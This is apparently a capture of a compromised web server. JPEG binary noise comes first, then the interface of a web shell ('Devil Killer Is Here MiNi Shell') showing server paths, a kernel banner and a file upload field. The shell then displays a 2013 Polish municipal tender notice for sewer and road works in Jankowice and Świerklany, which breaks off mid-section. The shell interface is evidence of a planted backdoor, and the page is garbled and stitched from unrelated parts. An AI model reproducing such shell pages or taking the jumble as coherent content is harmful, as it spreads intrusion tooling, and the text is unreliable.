JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130710/269100-N-2013.html

<p class="kh_header"><b>Jankowice: Zadanie nr 1 - Skanalizowanie części terenu Gminy w zakresie Zlewni P1 w Jankowicach z odprowadzeniem ścieków do Oczyszczalni w Świerklanach - etap III.
Zadanie nr 2 - Budowa dróg bocznych w rejonie ul. Stokrotkowej w Świerklanach 
wraz z budową odwodnienia</b><br>
<b>Numer ogłoszenia: 269100 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świerklany , ul. Świerklańska 54, 44-264 Jankowice, woj. śląskie, tel. 032 4327500, faks 032 4327509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swierklany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 - Skanalizowanie części terenu Gminy w zakresie Zlewni P1 w Jankowicach z odprowadzeniem ścieków do Oczyszczalni w Świerklanach - etap III.
Zadanie nr 2 - Budowa dróg bocznych w rejonie ul. Stokrotkowej w Świerklanach 
wraz z budową odwodnienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje realizację 2 zadań inwestycyjnych:
Zadanie nr 1 - budowa kanalizacji sanitarnej w rejonie ul. Rybnickiej, Leśnej, Stokrotkowej, Makowej, Fiołkowej i Plebiscytowej w Świerklanach oraz w rejonie ul. Krótkiej i Prostej  w Jankowicach.
Zadanie obejmuje wybudowanie sieci kanalizacji sanitarnej grawitacyjnej o łącznej długości 3.325 mb. Kanalizacja będzie wykonana głównie z rur PVC (SN8) z wydłużonym kielichem łączonych na wcisk o średnicach 200 mm (kolektory główne) i 160 mm (kanały boczne). Przewiduje się, że kanały boczne będą zakończone za granicą nieruchomości złączką przegubową fi 160 mm zaślepioną szczelnym korkiem. Miejsce zakończenia należy zaznaczyć palem drewnianym w kol. czerwonym z oznaczeniem nr przyłącza. Na wykonywanych kanałach grawitacyjnych Dn 200 przewidziano wykonanie studni rewizyjnych z kręgów betonowych fi 1200 mm z betonu klasy C35/45 (B-45), z kinetą monolityczną wykonaną z betonu samozagęszczalnego. Kinety studni mają mieć wykształcone kanały przepływowe i otwory na uszczelki DS.LKS 3 wargowe, do połączenia z rurami przewodowymi PVC-U. Przedmiot zamówienia obejmuje również odtworzenie 	nawierzchni dróg, ulic, chodników oraz terenów działek prywatnych.
	


Zadanie nr 2 - budowa dróg bocznych w rejonie ul. Stokrotkowej w Świerklanach wraz z budową odwodnienia.
Zadanie obejmuje nw. zakres robót:
1)	ul. Stokrotkowa odcinek A-J droga o natężeniu ruchem KR2 na odcinku: od km 0+004,48 do km 0+373,32 - nawierzchnia kostka betonowa brukowa grubości 10 cm szara Behaton 
szerokość: 
	2,50 m - od km 0+004,48 do km 0+157,38 
	2,50 ÷ 3,50 m - od km 0+157,38 do km 0+177,52 
	3,50 ÷ 4,50 m - od km 0+177,52 do km 0+214,60 
	4,50 m - od km 0+214,60 do km 0+373,32 

2)	ul. Stokrotkowa odcinek G-M droga o natężeniu ruchem KR2 na odcinku: od km 0+003,00 do km 0+192,56 - nawierzchnia kostka betonowa brukowa grubości 10 cm szara Behaton 
	szerokość:
	5,50 m - od km 0+003,00 do km 0+192,56 

3)	ul. Stokrotkowa odcinek N-Q droga o natężeniu ruchem KR2 na odcinku: od km 0+000,00 do km  0+111,07 - nawierzchnia kostka betonowa brukowa grubości 10 cm szara Behaton 
	szerokość: 
	5,50 m - od km 0+000,00 do km 0+111,07 

4)	odwodnienie ulicy Stokrotkowej - odcinki boczne za pomocą kratek ściekowych i projektowanej kanalizacji deszczowej - odrębne opracowanie, 

5)	wjazdy do posesji z kostki betonowej brukowej grubości 10 cm bordo Behaton - w ramach działki  drogowej, 

6)	obustronne pobocze z tłucznia kamiennego 
	szerokość: 
	0,75 m - odcinek od km 0+000,00 do km 0+338,09, 
	o szerokości zmiennej w ramach działki drogowej od km 0+338,09 do km 0+928,28 

7)	ograniczenie nawierzchni krawężnikiem betonowym: wystający 15 x 30 cm oraz najazdowy wtopiony i wystający 15 x 22cm osadzone na ławie z oporem z betonu C12/15 (B-15) 

Konstrukcja nawierzchni ulicy stokrotkowej - odcinki boczne: 
1)	ul. Stokrotkowa - odcinek A-J, droga gminna o natężeniu ruchu KR2 zbudowana z: 
	10 cm warstwa ścieralna z kostki betonowej brukowej szarej Behaton 
	3 cm podsypka cementowo -piaskowa 
	8 cm górna warstwa podbudowy z kruszywa kamiennego łamanego o frakcji 0 - 31,5 mm stabilizowanego mechanicznie 
	20 cm dolna warstwa podbudowy z kruszywa kamiennego łamanego o frakcji 31,5 - 63mm stabilizowanego mechanicznie 
	20 cm warstwa mrozochronna z łupka przepalonego 0-63mm
2)	ul. Stokrotkowa - odcinek G-M i N-Q, droga gminna o natężeniu ruchu KR2 zbudowana z: 
	10 cm warstwa ścieralna z kostki betonowej brukowej szarej Behaton 
	3 cm podsypka cementowo -piaskowa 
	8 cm górna warstwa podbudowy z kruszywa kamiennego łamanego o frakcji 0 - 31,5 mm stabilizowanego mechanicznie 
	20 cm dolna warstwa podbudowy z kruszywa kamiennego łamanego o frakcji 31,5 - 63mm stabilizowanego mechanicznie 
	30 cm warstwa mrozochronna z łupka przepalonego 0-63mm

Kanalizacja deszczowa i zbiornik chłonny:
1)	Wody opadowe z w/w terenu odprowadzane będą za pomocą projektowanych wpustów ulicznych. Projektuje się wpusty z osadnikami zbudowane z betonowych studni wykonanych z rur fi 500 mm, pierścienia odciążającego, podtrzymującego oraz Żeliwnego wpustu. Wpusty połączone będą z kanałem deszczowym za pomocą rury PVC-U fi 160 mm. Miejscem włączenia rury będą projektowane studnie rewizyjne. Do wykonania kanalizacji deszczowej stosować rury PVC-U o sztywności obwodowej SN8, SDR 34, ze standartowym kielichem, jednorodne z pierwotnego granulatu np. firmy Wavin fi 400, 315 mm, łączonych na uszczelki. Rury należy układać na podsypce piaskowej gr. 20 cm. Rury układać kielichami w kierunku przeciwnym do spadku dna wykopu. Głębokość ułożenia oraz spadki pokazano na profilach kanalizacji deszczowej. Projektuje się studnie rewizyjne fi 1200 monolityczne z kręgów Żelbetowych prefabrykowanych z betonu min. B45 z uszczelkami typu STEINHOFF SD z przykryciem płytą nastudzienną np. firmy PREFABET Kluczbork. Studnie zaopatrzyć we włazy Żeliwne typu ciężkiego klasy C fi 600 zgodnie z PN-87/H-7405/02 osadzone na Żelbetowych pierścieniach odciążających. Przejścia przez ściany betonowe studzienek wykonać za pomocą typowych przejść szczelnych.
2)	Wody opadowe i roztopowe z projektowanych dróg bocznych w rejonie ul. Stokrotkowej na odcinkach objętych opracowaniem będą odprowadzane do projektowanego zbiornika chłonnego o wymiarach dna 6 x 12 x 0,50 m o pojemności 36m3. Projektowany zbiornik jest otwarty, przeznaczony do zbierania wody powierzchniowej w celu jej odparowania oraz infiltracji w grunt. Skarpy zbiornika projektuje się o nachyleniu 1:1,5. Stabilizację biologiczną skarp należy wykonać poprzez obłożenie ich geokratą grubości 15 cm z bocznymi otworami na podsypce piaskowej grubości 10 cm. Na dnie zbiornika należy ułożyć geokratę grubości 20 cm z bocznymi otworami na podsypce piaskowej grubości 10 cm. Otwory w geokratach na skarpach i na dnie zbiornika wypełnić kamieniem łamanym do robót hydrotechnicznych fi 8-12 cm. Projektuje się ogrodzenie zbiornika siatką rozciągniętą na słupkach stalowych o wys. 2,0 m zabezpieczonych antykorozyjnie farbą. Słupki od góry zamknąć nakładkami zabezpieczającymi przed dostępem wody do środka słupka. Siatkę projektuje się ocynkowaną bądź powlekaną o wysokości 1,5 m. Pozostałą wysokość ogrodzenia zabezpieczyć drutem kolczastym. W ogrodzeniu od strony dojazdu wykonać furtkę zamykaną Ogrodzenie ma za zadanie wyeliminowanie dostępu osób postronnych. Projektuje się drogę dojazdową o szerokości 4,5 m i nachyleniu w kierunku zbiornika min. 0,5% Wody opadowe doprowadzone będą do zbiornika wylotem W o wymiarach 1,2 x 1,3 x 1,6 m Wylot projektuje się z betonu B 25 zbrojonego . Wylot posadowić na podsypce z pospółki o grubości 30 cm..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.23.31.20-6, 45.23.13.00-8, 45.10.00.00-8, 45.11.12.00-0, 45.11.13.00-1, 45.23.31.40-2, 45.11.27.10-5, 45.23.24.10-9, 45.23.24.11-6, 45.11.12.40-2, 45.23.44.11-6, 45.23.24.11-6, 45.23.13.00-8, 45.23.32.20-7, 45.23.32.23-8, 45.34.20.00-6, 45.11.27.10-5, 45.11.11.00-9, 45.23.31.50-5, 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 100.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełniania warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien zrealizować w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 roboty budowlane, odpowiadające swoim rodzajem i wartością robocie budowlanej stanowiącej przedmiot zamówienia, tzn. zrealizować co najmniej:
a)	1 zamówienie polegające na budowie kanalizacji sanitarnej grawitacyjnej lub deszczowej, z rur PVC, o długości nie mniejszej niż 3.000 mb każde zamówienie, 
oraz:
b)	1 zamówienie polegające na budowie jezdni dróg i/lub miejsc parkingowych z kostki brukowej betonowej wraz z podbudową, o powierzchni nie mniejszej niż 3.000 m2 każde zamówienie.
Wartości robót wykonanych w walutach innych niż w PLN, Wykonawca przeliczy wg średniego kursu NBP na dzień podpisania protokołu końcowego odbioru robót. Przeliczenie powyższego nastąpi w Załączniku nr 4 - Wykaz robót budowlanych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp - Załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  winien dysponować pracownikami posiadającymi odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania przedmiotu zamówienia, w tym kadrę kierowniczą składającą się z:
a)	kierownika budowy zadania nr 1 - posiadającego uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2010.243.1623 ze zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394);
b)	kierownika budowy zadania nr 2 - posiadającego uprawnienia budowlane w specjalności drogowej lub odpowiadające im uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2010.243.1623 ze zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394).
c)	kierownika robót instalacyjnych,
d)	kierownika robót drogowych.
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zamawiający nie dopuszcza pełnienia funkcji:
a)	kierownika budowy dla zadania nr 1 oraz kierownika robót instalacyjnych przez jedną osobę,
b)	kierownika budowy dla zadania nr 2 oraz kierownika robót drogowych przez jedną osobę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać środki finansowe lub zdolność kredytową co najmniej w wysokości 800.000,00 zł. Z treści informacji banku musi wynikać jednoznacznie wysokość (kwota) posiadanych środków finansowych lub zdolności kredytowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wniosek o dopuszczenie do udziału w postępowaniu 
2.	Oryginał pełnomocnictwa lub poświadczona notarialnie kopia, udzielonego osobom podpisującym wniosek o dopuszczenie do udziału w postępowaniu, o ile ich prawo do reprezentowania Wykonawcy nie wynika wprost z odpisu właściwego rejestru, ewidencji lub statutu [jeśli dotyczy] 
3.	Oryginał pełnomocnictwa lub poświadczona notarialnie kopia, do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenia zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo [jeśli dotyczy]. Pełnomocnik może być umocowany do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy 
4.	Umowa spółki cywilnej lub uchwała wspólników, z której wynikać będzie sposób reprezentacji spółki [jeśli dotyczy]</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
